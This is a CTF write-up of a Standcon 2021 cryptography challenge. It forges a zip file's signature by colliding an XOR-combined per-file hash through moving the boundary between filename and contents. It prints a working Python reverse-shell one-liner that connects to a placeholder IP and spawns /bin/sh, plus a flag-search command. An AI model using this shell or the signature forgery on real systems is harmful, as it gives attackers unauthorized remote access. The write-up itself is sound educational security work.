This is a challenge from Cryptography section of Standcon 2021. The challenge wants us to forge a signature of a zip file.
I’ve always wanted to drive a vehicle on another planet! I found the website they used to install software on Ingenuity. Could you help me get access to it pretty please?
First thing to do is to try to break the public key. It might be misconfigured RSA.
We can use RSACtfTool to do this. But unfortunately, it is not vulnerable.
Usually if the private key is not retrivable, the only thing left for us to do is to try and exploit the hash function.
Observe that the hash function works by xor the hash for every files in the zip… This looks sus
And indeed it is vulnerable! The idea is to create two identical file so that their hash will be cancelled after xor both of them together.
But how do we create 2 identical file? As we have the restriction to not able to create 2 files with the same name…
Let’s check the hash again,
contents = self.zip.read(file) h = SHA512.new(data=file.encode()) h.update(contents)
This means that it is actually doing
hash(file.encode() + file.content()).
file.encode() is just the filepath of the file!
So we can just modify the filename to create 2 files with the same hash!
If we have a file
The hash will be
hash('setup_script.py' + 'print('hello')')
The identical file can be
The hash will be
hash('setup_scr' + 'ipt.pyprint('hello')')
These 2 files will have the same hash!
The challenge also provided us a valid zip with a valid signature. We need to insert our own setup_script.py with a reverse shell script to gain access to the server.
So how do we do with the old
Modify the filename!
Reverse shell script
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",12321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")
In the end we get the shell and find the flag first with this command
find / -name "flag*" 2>/dev/null
Then we cat out the flag.